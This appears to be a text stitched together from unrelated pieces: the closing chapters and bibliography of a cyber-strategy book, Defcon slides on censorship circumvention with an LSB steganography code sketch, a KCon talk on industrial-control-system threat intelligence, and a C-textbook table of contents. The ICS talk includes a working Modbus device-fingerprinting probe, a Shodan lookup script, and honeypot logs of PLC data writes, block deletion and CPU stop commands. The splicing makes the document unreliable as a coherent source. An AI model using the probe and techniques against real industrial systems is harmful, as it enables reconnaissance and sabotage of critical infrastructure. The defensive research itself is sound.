is more “reliable” than other factors in the system. Second, IPv6 influences the single most powerful cyber attack advantage, anonym- 152 DATA ANALYSIS AND RESEARCH RESULTS 153 ity, at a “very high” level. These factors combine, via indirect influence calculations, to radiate the impact of IPv6 throughout the system and to magnify its importance. Thus, for decision makers, this research suggests that IPv6 is currently the single most efficient way to change the dynamics of strategic cyber security in favor of cyber defense. Fig. 
17 is a modified causal loop diagram which specifically highlights the signifi- cant influence relationship between IPv6 and the rest of the system. Figure 17. Causal Loop Diagram: IPv6 System Impact. All three other mitigation strategies received negative scores in the final index (Fig. 13), which means they are net receivers, and not providers, of influence in the sys- tem. The second place mitigation strategy is the application of the world’s best mili- tary doctrine, Art of War, to cyber conflict. It is the only other mitigation strategy to finish ahead of even one cyber attack advantage. Cyber arms control and deterrence remain at the bottom of the list, for reasons cited earlier in this book. In summary, this analysis suggests that, even beyond the four cyber attack mitiga- tion strategies evaluated by the author, decision makers could prioritize their invest- ment in other mitigation strategies by category, according to the following formula. Key Findings 154 DATA ANALYSIS AND RESEARCH RESULTS 1. Technical 2. Military 3. Political A technology-centric approach has a greater DEMATEL-calculated influence on the system of strategic cyber security due in part to the fact that it is more reliable than counting on a human-dependent approach – especially when politics come into play. Thus, IPv6 finished first in this list of strategies, and arms control (a hybrid politi- cal/technical approach) moved ahead of deterrence (which relies only on political/ military factors) in the final calculation. 155 V. CONCLUSION 11. RESEARCH CONTRIBUTIONS In the post-World War II era, cyber security has evolved from a technical discipline to a strategic concept. The power of the Internet, our growing dependence upon it, and the disruptive capability of cyber attackers now threaten national and interna- tional security. The nature of a security threat has not changed, but the Internet provides a new delivery mechanism that can increase the speed, scale, and power of an attack. National critical infrastructures are now at risk – not only during war, but also in times of peace. As a consequence, all future political and military conflicts will have a cyber dimension, whose size and impact are difficult to predict. World leaders must address the threat of strategic cyber attacks with strategic re- sponses in favor of cyber defense. In this book, the author examines four strategies that nation-states will likely adopt to mitigate the cyber attack threat: deterrence, arms control, doctrine, and technology. Cyber attack deterrence lacks credibility because hacker skills are easy to acquire, and because attackers are often able to conduct high-asymmetry attacks even while remaining anonymous to their victims. Cyber arms control appears unlikely, because cyberspace is too big to inspect, and malicious code is even hard to define. However, political will, perhaps in the wake of a future cyber attack, could change the status quo. The world’s best military doctrine, Art of War, is more helpful than the first two strategies, but there are at least ten distinctive aspects of the cyber battlefield, none of which fits easily into Sun Tzu’s paradigm. IPv6 answers some of our current security problems, but unfortunately it also cre- ates new problems, including a necessarily long and dangerous transition phase. 
However, in spite of the shortcomings of IPv6, the DEMATEL method clearly shows that among the four examined mitigation strategies, IPv6 is the most likely to have a tangible impact on reducing the key advantages of a cyber attacker, and thus it is the most likely strategy to improve a nation’s strategic cyber defense posture. The simple reason is that it can reduce the most influential advantage of a cyber attacker, anonymity, and it does so with a higher degree of reliability than the other factors 156 CONCLUSION in this research. Thus, the influence of IPv6 grows over time and impacts all other factors in strategic cyber security. DEMATEL provided a way to analyze the four proposed mitigation strategies with scientific rigor. It calculated specific levels of influence for each key concept identi- fied, and it created a causal loop diagram of the system they comprise. Finally, it calculated the most efficient way – among the four strategies in question – to reduce the threat of strategic cyber attack. The contributions of this book are summarized as follows: • an argument that computer security has evolved from a technical discipline to a strategic concept; • the evaluation of four distinct strategic approaches to mitigate the cyber at- tack threat and to improve a nation’s cyber defense posture; • the use of the Decision Making Trial and Evaluation Laboratory (DEMATEL) to analyze this book’s key concepts; and • the recommendation to policy makers of IPv6 as the most efficient of the four cyber defense strategies. Suggestions for Future Research The DEMATEL method has helped to clarify the landscape of strategic cyber secu- rity. The author believes that DEMATEL could also be used to examine other out- standing problems related to cyber security. Here are three possibilities: Can a cyber attack be an act of war?461 The dynamic nature of cyberspace makes it difficult to predict the next cyber attack, or how serious it could be. An effects-based approach seems inevitable: if the level of human suffering or economic damage is high enough, national leaders will retaliate. This applies both to government and private sector critical infrastructures. A key challenge for national security planners is that the hacker tools and techniques required for cyber espionage are often the same as for cyber attack.462 The difference lies in motivation: does the hacker desire merely to steal information, or is the attack a prelude to war? Can we solve the attribution problem? Smart hackers exploit the international, maze-like architecture of the Internet to conduct anonymous or deniable cyber at- 461 More precisely, the question may be whether a cyber attack could be considered an “armed attack” as specified by the UN Charter. 462 These may be differentiated by the terms computer network exploitation (CNE) and computer net- work attack (CNA). 157 tacks. The trail of evidence often runs through countries with which the victim’s government has poor diplomatic relations or no law enforcement cooperation, and cyber investigations typically end at a hacked, abandoned computer, where the trail goes cold. This dynamic encourages “false flagging” operations – where the attacker tries to pin the blame on a third party – and creates an environment in which even terrorists can find a home on the Internet.463 Solving the attribution problem will require harmonizing cyber crime laws, improving cyber defense methods, and gen- erating the political will to share evidence and intelligence. 
Can we shift the advantage to cyber defense? Hackers today have enormous ad- vantages over cyber defenders, including anonymity and asymmetry. In fact, if there is a future war between major world powers, a significant degree of the fighting may take place in cyberspace, and the first victim of the conflict could even be the Internet itself. To shift the balance, cyber defenders require a higher level of trust in hardware and software,464 improved performance metrics for defense strategies, and the ability to realistically model the hacker threat in a laboratory. Because it is impossible to eliminate all malicious code from a network, cyber defenders need better ways to neutralize what they cannot find. Governments could also require Internet Service Providers (ISP) to play a more helpful role in preventing the spread of malware. 463 Gray & Head, 2009. 464 Supply chain subversion, i.e. inserting malicious code in the design or production phase of product development, can be almost impossible to detect by the end user. 158 BIBLIOGRAPHY VI. BIBLIOGRAPHY “53/70: Developments in the field of information and telecommunications in the context of international security,” (4 Jan 1999) United Nations General Assembly Resolution: Fifty-Third Session, Agenda Item 63. Acoca, B. (Jul 2008) “Online identity theft,” The OECD Observer, Organisation for Economic Cooperation and Development, 268, 12. “Active Engagement, Modern Defence: Strategic Concept for the Defence and Security of the Members of the North Atlantic Treaty Organisation,” (2010) NATO website: www.nato.int. Adams, J. (2001) “Virtual Defense,” Foreign Affairs 80(3) 98-112. “Advisory 01-009, Increased Internet Attacks against U.S. Web Sites and Mail Servers Possible in Early May,” (26 Apr 2001) Federal Bureau of Investigation (FBI) National Infrastructure Protection Center (NIPC). “Air Force Association; Utah’s Team Doolittle Wins CyberPatriot II in Orlando,” (10 Mar 2010) Defense & Aerospace Business, 42. Aitoro, J.R. (2 Oct 2009) “Terrorists nearing ability to launch big cyberattacks against U.S.” NextGov: www.nextgov.com. Allen, P.D. & Demchek, C.C. (Mar-Apr 2003) “The Cycle of Cyber Conflict,” Military Review. Anonymous. (28 Mar 2009) “Thai cybercrime law denounced as ‘threat to freedom’.” Bangkok Post website, Bangkok, Thailand in English, reported by BBC Monitoring Asia Pacific (29 Mar 2009). Arquilla, J. & Ronfeldt, D. (Apr 1993) “Cyberwar is Coming!” Comparative Strategy 12(2) 141- 165. Barnes, J.E. (28 Nov 2008) “Pentagon computer networks attacked,” Los Angeles Times. Barrera, D., Wurster, G., & van Oorschot, P.C. (14 Sep 2010) “Back to the Future: Revisiting IPv6 Privacy Extensions,” Carleton University School of Computer Science, Ottawa, ON, Canada. “Belarus,” Press Reference: www.pressreference.com/A-Be/Belarus. Bliss, J. (23 Feb 2010) “U.S. Unprepared for ‘Cyber War’, Former Top Spy Official Says,” Bloomberg Businessweek. Brodie, B. (1946) THE ABSOLUTE WEAPON: Atomic Power and World Order. New York: Harcourt, Brace and Co. Bullough, O. (15 Nov 2002) “Russians Wage Cyber War on Chechen Websites,” Reuters. Caterinicchia, D. (12 May 2003) “Air Force wins cyber exercise,” Federal Computer Week 17(14) 37. 159 Chan, W.H. (25 Sep 2006) “Cyber exercise shows lack of interagency coordination,” Federal Computer Week 20(33) 61. Chen, T. & Robert, J-M. (2004) “The Evolution of Viruses and Worms,” Statistical Methods in Computer Security, William W.S. Chen (Ed), (NY: CRC Press) Ch.16, 265-286. Churchman, D. 
Tools for Censorship Resistance
Rachel Greenstadt, greenie@eecs.harvard.edu
Defcon XII, July 29, 2004
http://www.eecs.harvard.edu/~greenie/defcon-slides.pdf

Overview
- Approaches to censorship
- Circumvention methods
- Case study: China
- Censorship in a "free" society; the LOCKSS project
- Unobservability

A Taxonomy of Censorship
- Generalized blocking
  - Blocking publishers/servers
  - Blocking receivers/clients
  - Modifying content for censorship
  - "Arms race" solutions okay
- Surveillance/chilling effects
  - Relies on accountability/punishment
- Effective censors use multiple techniques

Blocking Publishers
[Figure 1: Bonsai kitten picture from bonsaikitten.com]
- Hardest form of censorship to do (spam)
- Offensive material forbidden by govt/ISP/DOS attackers

Circumventing Publisher Blocking
- Find someone who will make material available
  - More permitting ISP
  - Writable web pages (blogs, etc.)
  - Outside jurisdictions
- Anonymity services
  - Can help if publisher blocking is combined with surveillance
  - Hidden servers may prove useful for avoiding DOS attacks
  - Current systems probably too fragile

Blocking Receivers
- If the blocking authority has control over some, but not all, Internet users
  - Government firewalls at routers
  - Corporate firewalls
  - Nannyware in schools/libraries

Blocking Approaches 1
"Web Site Blocked. The website you were trying to access was deemed inappropriate by the Authorities. If you feel that this particular web site should not have been blocked per our policy, you may ask that the web site be removed from the blocked list by going to the following website. If you have any questions, contact us at internetpolice@authority.net."

Blocking Approaches 2

Blocking Techniques
- Block open or closed?
- Drop packets at gateway based on IP address
- DNS redirection
- Filter based on keywords
- Filter based on images ("Finding Naked People")
- Block loophole servers
  - Proxies/anonymizers/translators/google cache/wayback machine/etc.

Circumvention Methods
- Proxies
- Tunnels
- Mirrors
- Email (spam)
- P2P systems to make proxies available
  - Safeweb/Triangle-Boy, Six/Four, Peek-a-booty, Infranet

Publicizing the Circumvention System
1. You don't: used by small set of people, communicate out of band
2. Use something to communicate that they won't or can't block
   - This may be harder than you think
3. Closed group: no one sees the whole pattern
   - Infranet: keyspace-hopping (client puzzles)
   - TU Dresden: captchas
   - Won't work against a resource-rich adversary

Stego in Circumvention Systems
- Can make proxy servers more difficult to detect and block; clients have plausible deniability
- Infranet (MIT NMS)—embed requests for content in the sequence of HTTP requests, embed content itself steganographically in images
- Camera Shy (Hacktivismo)—uses LSB steganography; automatically scans and parses web pages for applications
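The LSB approach mentioned for Camera Shy can be made concrete with a small sketch. The following is a minimal, hypothetical illustration (not Camera Shy's or Infranet's actual code) of hiding a message in the least-significant bits of a buffer of pixel bytes; real tools work on specific image formats and layer encryption on top. The statistical uniformity this embedding introduces is also exactly what the later "Image Steganography" slide means by LSB steganography being easily detectable.

```python
# Minimal LSB embed/extract sketch over a raw pixel byte buffer.
# Illustrative only: real tools handle image formats, encryption,
# and capacity checks that are omitted here.

def embed(pixels: bytearray, message: bytes) -> bytearray:
    """Hide message in the least-significant bit of each pixel byte.
    A 32-bit length header is stored first so extract() knows when to stop."""
    payload = len(message).to_bytes(4, "big") + message
    bits = [(byte >> i) & 1 for byte in payload for i in range(7, -1, -1)]
    if len(bits) > len(pixels):
        raise ValueError("cover buffer too small for message")
    out = bytearray(pixels)
    for idx, bit in enumerate(bits):
        out[idx] = (out[idx] & 0xFE) | bit   # overwrite the LSB only
    return out

def extract(pixels: bytes) -> bytes:
    """Recover the message by reading back the LSBs (MSB-first per byte)."""
    def read_bytes(start_bit: int, count: int) -> bytes:
        value = bytearray()
        for b in range(count):
            byte = 0
            for i in range(8):
                byte = (byte << 1) | (pixels[start_bit + b * 8 + i] & 1)
            value.append(byte)
        return bytes(value)
    length = int.from_bytes(read_bytes(0, 4), "big")
    return read_bytes(32, length)

if __name__ == "__main__":
    cover = bytearray(range(256)) * 40            # stand-in for pixel data
    stego = embed(cover, b"meet at the usual place")
    assert extract(stego) == b"meet at the usual place"
    print("message survives, but the LSB statistics no longer match the cover")
```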
Tools
- Peacefire Circumventor: http://www.peacefire.org
- Psiphon: http://www.citizenlab.org/
- DIT: http://www.dit-inc.us/
- Anonymizer: http://www.anonymizer.com/
- TOR: http://freehaven.net/tor/
- Hacktivismo: http://www.hacktivismo.com/
- Freenet-china: http://www.freenet-china.org/

Internet Censorship in China
- Use publisher/receiver blocking, surveillance
- Makes evident how much of "cyberspace" is tied to national borders and how much isn't
- Opaque system, closed blocking

Goals
- Block dissident websites and pornography
- Belief that access to the Internet would foment change/unrest
- Also—Internet used as coordination tool for dissidents
- 3 main dissident groups (RAND): Falun Gong, Chinese Democratic Party, Tibetan/Taiwanese sites
- Also block news, health, education, gov't, religion

PRC Resources
- Control of routers inside China
- Internet access in country through cooperative ISPs
- Sophisticated network and Internet cafe surveillance
- Approx. 30,000+ employees to find sites to filter (Big Mamas/volunteers)
- Ability to arrest/detain/interrogate suspicious individuals

Evolution of Chinese Censorship
Witnessing the "arms race"
- 1995 Internet commercially available in China
- 1996 "Great Firewall of China"
- 1997 Regulations place liability for Internet use on ISPs
- 1999 Foreign dissident sites DOS'ed
- 2000 Golden Shield begins, Security China 2000
- 2001 Safeweb/Triangle Boy blocked
- 2001 Capital crime to "provide state secrets" over Internet
- 2002 Pledge of Self-Discipline for Chinese Internet Industry
- 2002 DNS hijacking
- 2002 Attempt to block google -> keyword blocking
- 2002 More fine-grained blocking (CNN, blogspot)
- 2002 Internet cafe fire, PRC closes cafes
- 2002 Cafes required to install surveillance software
- 2002 Downtime punishment
- 2004 Est. 87 million Internet users in China
- 2004 PRC monitoring SMS text messages

Sad Story of Safeweb
- Set up a proxy service, got blocked
- Set up a P2P network of proxies, they got blocked
  - Almost immediately
- With their resources, China can discover the peers and block them, even with rate-limiting measures
- You try getting a P2P network up and running this way
- Involuntary servers? (In a Windows app?)
  - On a safe port—blocked
  - A gazillion IIS servers, there's a good idea...
But They Wouldn't Block X...
- Only a few sites they unblocked (google, blogspot)
- Even these they do selective blocking
- And random P2P servers aren't likely to be useful to them for anything
- Don't expect companies to help you
  - We're selling them surveillance tech
  - They've signed self-discipline pledges too

VIP Reference
- Dissident email newsletter (http://come.to/dck)
- Most successful widespread circumvention
- Spam's a hard problem
- Sent to prominent party members, random Chinese, and dissidents
- Not without repercussions: Lin Hai sentenced to 2 years in prison for providing 30,000 email addresses to "overseas hostile publications"

Implications Outside China
- Traffic routed through China subject to filtering
- Root nameserver in China could cause people outside China to be subject to DNS hijacking
- Common carrier status?

References on China
- "Empirical Analysis of Internet Filtering in China," Zittrain/Edelman, Harvard Berkman Center, http://cyber.law.harvard.edu/filtering/china/
- "You've Got Dissent! Chinese Dissident Use of the Internet and Beijing's Counter-Strategies," Chase/Mulvenon, RAND, http://www.rand.org/publications/MR/MR1543/

Document Distortion or Removal
- Form of blocking: previously available items are changed or disappear
- Concern in U.S. (talk at PORTIA)
- Can be mitigated with digital signatures
- BUT—often self-censorship

Example: Time Magazine
- This article was removed from Time's online website
- Also excised from the Table of Contents
- From memoryhole.org

LOCKSS: Lots of Copies Keep Stuff Safe
- Libraries help prevent document distortion by preserving documents in many locations
- LOCKSS is a P2P system to help libraries
  - Archive documents and avoid bit rot
  - Maintain consensus about which document is correct
- Some online sources doing similar things (wayback machine, memoryhole, cryptome, google cache)

Unobservability as Censorship Resistance
- Unobservability hides both the content and the fact that covert communication is taking place
- Examples: steganography, covert channels
- Can help circumvent surveillance
- And blocking (can't block what you don't know is there)
- Dissident two-way communication

Limitations of Encryption
- It may be forbidden, or bring unwelcome suspicion
- Censoring authority may have the ability to gain keys (Britain)
  - Many systems built to avoid this problem
- Requires some degree of coordination (keys)/technical sophistication

Properties for Unobservable Systems
- Undetectability
  - Plausible (legitimate cover)
  - Encode the message to match channel statistically
- Robustness
  - Message survive natural/malicious lossiness
- Indispensable
Limitations of Unobservability
- Hard to have security guarantees about detectability
- Many 'unobservable' approaches are detectable—security through obscurity
- Especially true if you are worried about the channel being blocked

Pitfalls of Randomness
[Images from Westfeld's attacks on steganographic systems]
- Embedding cryptographic output in nonrandom sources is obvious
- In general, bits are not random
- I made this mistake with TCP timestamps

Image Steganography
- LSB steganography is detectable. Easily.
- Increasingly good blind JPEG steg detection (Fridrich)
- Certainly an arms race
- Robustness?
- Image choice steganography
  - Very low bandwidth
  - But robust, hard to detect
  - Fotoblogs...

Conclusions
- Circumvention is easy to do on small scale, hard to do on large scale
- Hardest problem is distributing circumvention systems, without having them blocked
- Arms race double edged
  - Can cause working circumvention methods to get blocked
  - Make circumventor pay higher price for control
- With surveillance, need to make sure users aware of risks
Sensing, Trapping, Intelligence, Collaboration
Cyberspace ICS Threat Intelligence
[ Kimon @ 灯塔实验室 (lit. "Beacon Lab") ]

About Us
- Wang Qimeng (Kimon)
- Phone: 18500851413
- Email: kimon@plcscan.org
- WeChat: ameng929

Agenda
- Basic threat intelligence vs. advanced threat intelligence
- Information collection methods vs. threat capture techniques
- A passive threat-sensing architecture
- From threat data to threat intelligence

Part. 01 Basic Threat Intelligence vs. Advanced Threat Intelligence

Foreign intelligence-collection programs aimed at cyberspace
- SHINE (Project Shodan Intelligence Extraction)
- X-Plane, Treasure Map, NCR
- Mapping cyberspace to build a god's-eye view of the network

Levels of threat intelligence
- Basic threat intelligence (data intelligence): traffic/files; BGP/AS/routing/Whois/fingerprints; passive DNS and reputation data
- Tactical threat intelligence (data correlation & analysis): machine-readable artifacts (IoC/TTP); operationalized intelligence and coordinated response
- Strategic threat intelligence (value & decision-making): human-readable reports; intent analysis, prediction, decision support

Data intelligence
- Data intelligence is the foundation of threat intelligence
- It still needs fusion, correlation, and analysis
- Strategic intelligence informs top-level decisions and cannot afford to be wrong

ICS threat intelligence
- National critical information infrastructure
- Escalating threats against energy, critical manufacturing, and similar sectors: Stuxnet/Duqu/Flame, BlackEnergy
- Escalating threats against SCADA systems: remotely controllable SCADA and PLCs
- ICS assets scattered across the Internet; active probing of proprietary ICS protocols
- Threat activity against ICS facilities deserves closer study: it touches the global cyberspace "bottom line" and carries strategic-level significance
- https://apt.securelist.com

Part. 02 Information Collection Methods vs. Threat Trapping Techniques

Open Internet device search platforms
- Shodan (shodan.io), Censys (censys.io), ZoomEye (zoomeye.org), ICSfind (icsfind.org), IVRE (ivre.rocks), Rapid7 (scan.io)

Open-source scanner frameworks
- nmap (nmap.org), zmap (zmap.io), masscan (github.com/robertdavidgraham/masscan)

Collecting ICS device information through fingerprinting platforms
- "ICS/SCADA/PLC Google/Shodanhq Cheat Sheet": http://scadastrangelove.org/
- "Internet connected ICS/SCADA/PLC Cheat Sheet": http://www.scadaexposure.com/

Identifying ICS systems and devices through standard, public or proprietary ICS protocols

Identifying ICS systems and devices through conventional service characteristics (banners)

Identification tools (examples)
- https://scadahacker.com/resources/msf-scada.html

Intelligence collection is more than "scanning"
- It is the critical first step of the kill chain: reconnaissance, weaponization, delivery, exploitation, installation, command and control, actions on objectives
- From a single point to the whole picture: one exposed ICS service can lead into a running industrial production network
- Locating ICS devices across the entire 4-billion-address IPv4 space
- New intrusion patterns against ICS networks: PLC-Blaster
- Device search platforms provide a timeline view of device information and ready-made Internet "targets"

Threat capture methods
- Traditional defensive security appliances
- Honeypots aimed at ICS: Cisco's PLC honeypot, Digital Bond, Trend Micro, Conpot

Problems with ICS honeypots
- Easy to identify: low-fidelity emulation of ICS protocols; tedious configuration that leaves telltale gaps; no emulation of the underlying industrial process
- Hard to manage: cumbersome deployment; no distributed management mechanism
- Hard to analyze: outdated logging mechanisms; data volume outgrows analysis; no integration with threat intelligence

Actively surveying honeypot deployments abroad

Case: finding foreign honeypots through Shodan searches and the Shodan API

Case: foreign composite ICS honeypots

Part. 03 Passive Threat-Sensing Techniques

Active fingerprinting of ICS devices: the S7comm session
- TCP three-way handshake establishes the TCP connection
- ISO-TP (COTP) connection setup
- S7 connection request and response establish the S7 session
- S7 read requests then return data
- Emulating the S7comm protocol yields device information such as:
  Module: 6ES7 151-8AB01-0AB0
  Basic Hardware: 6ES7 151-8AB01-0AB0
  Version: 3.2.3
  System Name: SIMATIC 300(1)
  Module Type: AN12CPU
  Serial Number: S C-B8TH91812011
  Copyright: Original Siemens Equipment

Passive fingerprinting of ICS devices
- See "揭秘VxWorks—直击物联网安全罩门" (Demystifying VxWorks: the soft spot of IoT security)
- Obtaining device project-file information through the Modbus protocol
- Redpoint NSE script fingerprints; debug mode

Passive threat-sensing platform architecture
[architecture diagram]

Automatic recognition of interaction behavior patterns

Manual analysis after automatic recognition
- Extract the interaction patterns of common scanning scripts and tools: Nmap scripts (Redpoint), Metasploit modules, protocol-specific scripts found on Git
- Extract the behavior patterns of scanners and scanning services: Shodan, Censys, Rapid7
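To make the protocol-level identification described above concrete, here is a minimal, hypothetical probe in the spirit of the Redpoint-style fingerprinting scripts: it sends a single Modbus/TCP Read Device Identification request (function 0x2B, MEI type 0x0E) over a raw socket and prints whatever identification objects the device returns. This is a sketch, not the lab's actual tooling; it assumes a standard Modbus/TCP endpoint on port 502, uses only the Python standard library, and omits the retries, conformity-level handling, and multi-request paging a production scanner would need.

```python
#!/usr/bin/env python3
"""Minimal Modbus/TCP "Read Device Identification" probe (sketch only)."""
import socket
import struct
import sys

def read_device_id(host: str, port: int = 502, unit: int = 1, timeout: float = 5.0):
    # PDU: function 0x2B, MEI type 0x0E, ReadDevId code 0x01 (basic), object 0x00
    pdu = bytes([0x2B, 0x0E, 0x01, 0x00])
    # MBAP header: transaction id, protocol id (0), remaining length, unit id
    mbap = struct.pack(">HHHB", 0x0001, 0x0000, len(pdu) + 1, unit)
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(mbap + pdu)
        resp = s.recv(1024)
    if len(resp) < 15 or resp[7] != 0x2B:
        raise ValueError("not a Modbus device-identification response")
    # Objects start after MBAP (7 bytes) plus func/MEI/devid/conformity/more/next/count
    objects, offset = {}, 14
    for _ in range(resp[13]):                      # resp[13] = number of objects
        obj_id, obj_len = resp[offset], resp[offset + 1]
        objects[obj_id] = resp[offset + 2 : offset + 2 + obj_len].decode(errors="replace")
        offset += 2 + obj_len
    return objects   # typically {0: vendor name, 1: product code, 2: revision}

if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else "192.0.2.10"   # placeholder address
    for obj_id, value in read_device_id(target).items():
        print(f"object {obj_id}: {value}")
```

Run against a PLC or a Conpot instance this will usually print the vendor name, product code, and revision, the same kind of fields the S7comm example above recovers over port 102.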
Part. 04 From Threat Data to Threat Intelligence

Real capture cases (honeypot log excerpts)

# writing into data block DB1
2016-02-10 15:25:44 [209.133.66.214] Write request, Area : DB1, Start : 0, Size : 452 --> OK
2016-02-10 15:25:45 [209.133.66.214] Write request, Area : DB1, Start : 452, Size : 60 --> OK
# writing into data blocks DB1, DB2, DB3
2016-02-22 06:54:19 [93.115.95.202] Write request, Area : DB1, Start : 0, Size : 16 --> OK
2016-02-22 06:54:19 [93.115.95.202] Write request, Area : DB2, Start : 0, Size : 16 --> OK
2016-02-22 06:54:19 [93.115.95.202] Write request, Area : DB3, Start : 0, Size : 16 --> OK
# deleting CPU program blocks
2016-02-22 06:54:43 [93.115.95.202] CPU Control request : Block Insert or Delete --> OK
# restarting the PLC CPU
2016-02-22 06:58:09 [37.48.80.101] CPU Control request : Warm START --> OK
# stopping the PLC CPU
2016-02-22 06:58:21 [37.48.80.101] CPU Control request : STOP --> OK
# modifying the PLC system time
2016-02-22 07:03:02 [37.48.80.101] System clock write requested

- Attack actions: writing memory data; manipulating CPU state; modifying the system clock; deleting system program blocks
- Attack impact: corrupted data; program execution stops; wrong system time; system malfunction

Monitoring for PLC-Blaster
- S7-300: FB65 "TCON", FB63 "TSEND", FB64 "TRCV"
- S7-1200: TCON, TSEND/TUSEND, TRCV/TURCV
- CP modules: FC5 "AG_SEND", FC6 "AG_RECV"

Overflow attacks against HMIs
Web attacks against HMIs
Attacks against the HMI's industrial process logic

Tactical threat intelligence on the Shodan organization (several screenshot slides)

Strategic threat intelligence on the Shodan organization
- http://plcscan.org/blog/2016/06/ics-security-research-report-2016-05/
- Scanner host table (a minimal Shodan API lookup sketch follows at the end of this deck):

IP             | RDNS           | ?   | S7 (102) | Modbus (502) | EtherNet/IP (44818)
82.221.105.6   | census10       | 169 | 20130821 | 20130827     | 20141025
71.6.167.142   | census9        | 232 | 20140720 | 20140526     | 20140504
71.6.135.131   | census7        | 234 | 20140508 | 20140509     | 20140510
66.240.236.119 | census6        | 233 | 20140602 | 20140706     | 20140430
71.6.158.166   | ninja.census   | 111 | ——       | ——           | 20160520
82.221.105.7   | census11       | 167 | 20140206 | 20140206     | 20140207
85.25.43.94    | rim.census     | 192 | 20150122 | ——           | 20141016
71.6.165.200   | census12       | 236 | 20140222 | 20140227     | 20140212
198.20.99.130  | census4        | 92  | 20140516 | 20140630     |
66.240.192.138 | census8        | 237 | 20140226 | 20140225     | 20140226
71.6.146.185   | Inspire.census | 67  | ——       | 20160414     |
66.240.219.146 | burger.census  | 107 | ——       | ——           | 20160520
198.20.69.98   | border.census  | 215 | 20141007 | 20141104     | 20140604
198.20.70.114  | census3        | 224 | 20140512 | 20140518     | 20140603
188.138.1.218  | unknown        | 93  | 20150811 | 20150627     | 20160524

[ 灯塔实验室@KCon ]
THANKS
[ 灯塔实验室@KCon ]
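For completeness, here is the small, hypothetical Shodan API sketch referenced above: given one of the scanner addresses from the table, it pulls the host record and prints the ports and banners Shodan has on file. It assumes the official shodan Python package and a valid API key (the key string below is a placeholder); field names such as "data", "port", and "product" are ones the Shodan host API commonly returns, but exact contents vary per host.

```python
# Sketch: look up one of the "census" scanner hosts from the table above
# with the official Shodan Python library. Requires `pip install shodan`
# and a real API key; YOUR_SHODAN_API_KEY is a placeholder.
import shodan

API_KEY = "YOUR_SHODAN_API_KEY"

def describe_host(ip: str) -> None:
    api = shodan.Shodan(API_KEY)
    host = api.host(ip)                      # one lookup per call
    print(ip, host.get("hostnames"), host.get("org"))
    for service in host.get("data", []):     # per-port banner records
        print("  port", service.get("port"), service.get("transport", "tcp"),
              (service.get("product") or "").strip())

if __name__ == "__main__":
    describe_host("71.6.167.142")            # the census9 row from the table
```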
目 录 封面 扉页 版权 内容提要 作者简介 前言 第1章 初识C语言 1.1 C语言的起源 1.2 选择C语言的理由 1.2.1 设计特性 1.2.2 高效性 1.2.3 可移植性 1.2.4 强大而灵活 1.2.5 面向程序员 1.2.6 缺点 1.3 C语言的应用范围 1.4 计算机能做什么 1.5 高级计算机语言和编译器 1.6 语言标准 1.6.1 第1个ANSI/ISO C标准 1.6.2 C99标准 1.6.3 C11标准 1.7 使用C语言的7个步骤 1.7.1 第1步:定义程序的目标 1.7.2 第2步:设计程序 1.7.3 第3步:编写代码 1.7.4 第4步:编译 1.7.5 第5步:运行程序 1.7.6 第6步:测试和调试程序 1.7.7 第7步:维护和修改代码 1.7.8 说明 2 1.8 编程机制 1.8.1 目标代码文件、可执行文件和库 1.8.2 UNIX系统 1.8.3 GNU编译器集合和LLVM项目 1.8.4 Linux系统 1.8.5 PC的命令行编译器 1.8.6 集成开发环境(Windows) 1.8.7 Windows/Linux 1.8.8 Macintosh中的C 1.9 本书的组织结构 1.10 本书的约定 1.10.1 字体 1.10.2 程序输出 1.10.3 特殊元素 1.11 本章小结 1.12 复习题 1.13 编程练习 第2章 C语言概述 2.1 简单的C程序示例 2.2 示例解释 2.2.1 第1遍:快速概要 2.2.2 第2遍:程序细节 2.3 简单程序的结构 2.4 提高程序可读性的技巧 2.5 进一步使用C 2.5.1 程序说明 2.5.2 多条声明 2.5.3 乘法 2.5.4 打印多个值 2.6 多个函数 2.7 调试程序 2.7.1 语法错误 2.7.2 语义错误 3 2.7.3 程序状态 2.8 关键字和保留标识符 2.9 关键概念 2.10 本章小结 2.11 复习题 2.12 编程练习 第3章 数据和C 3.1 示例程序 3.2 变量与常量数据 3.3 数据:数据类型关键字 3.3.1 整数和浮点数 3.3.2 整数 3.3.3 浮点数 3.4 C语言基本数据类型 3.4.1 int类型 3.4.2 其他整数类型 3.4.3 使用字符:char类型 3.4.4 _Bool类型 3.4.5 可移植类型:stdint.h和inttypes.h 3.4.6 float、double和long double 3.4.7 复数和虚数类型 3.4.8 其他类型 3.4.9 类型大小 3.5 使用数据类型 3.6 参数和陷阱 3.7 转义序列示例 3.7.1 程序运行情况 3.7.2 刷新输出 3.8 关键概念 3.9 本章小结 3.10 复习题 3.11 编程练习 第4章 字符串和格式化输入/输出 4 4.1 前导程序 4.2 字符串简介 4.2.1 char类型数组和null字符 4.2.2 使用字符串 4.2.3 strlen()函数 4.3 常量和C预处理器 4.3.1 const限定符 4.3.2 明示常量 4.4 printf()和scanf() 4.4.1 printf()函数 4.4.2 使用printf() 4.4.3 printf()的转换说明修饰符 4.4.4 转换说明的意义 4.4.5 使用scanf() 4.4.6 printf()和scanf()的*修饰符 4.4.7 printf()的用法提示 4.5 关键概念 4.6 本章小结 4.7 复习题 4.8 编程练习 第5章 运算符、表达式和语句 5.1 循环简介 5.2 基本运算符 5.2.1 赋值运算符:= 5.2.2 加法运算符:+ 5.2.3 减法运算符:- 5.2.4 符号运算符:-和+ 5.2.5 乘法运算符:* 5.2.6 除法运算符:/ 5.2.7 运算符优先级 5.2.8 优先级和求值顺序 5.3 其他运算符 5.3.1 sizeof运算符和size_t类型 5 5.3.2 求模运算符:% 5.3.3 递增运算符:++ 5.3.4 递减运算符:-- 5.3.5 优先级 5.3.6 不要自作聪明 5.4 表达式和语句 5.4.1 表达式 5.4.2 语句 5.4.3 复合语句(块) 5.5 类型转换 5.6 带参数的函数 5.7 示例程序 5.8 关键概念 5.9 本章小结 5.10 复习题 5.11 编程练习 第6章 C控制语句:循环 6.1 再探while循环 6.1.1 程序注释 6.1.2 C风格读取循环 6.2 while语句 6.2.1 终止while循环 6.2.2 何时终止循环 6.2.3 while:入口条件循环 6.2.4 语法要点 6.3 用关系运算符和表达式比较大小 6.3.1 什么是真 6.3.2 其他真值 6.3.3 真值的问题 6.3.4 新的_Bool类型 6.3.5 优先级和关系运算符 6.4 不确定循环和计数循环 6.5 for循环 6 6.6 其他赋值运算符:+=、-=、*=、/=、%= 6.7 逗号运算符 6.8 出口条件循环:do while 6.9 如何选择循环 6.10 嵌套循环 6.10.1 程序分析 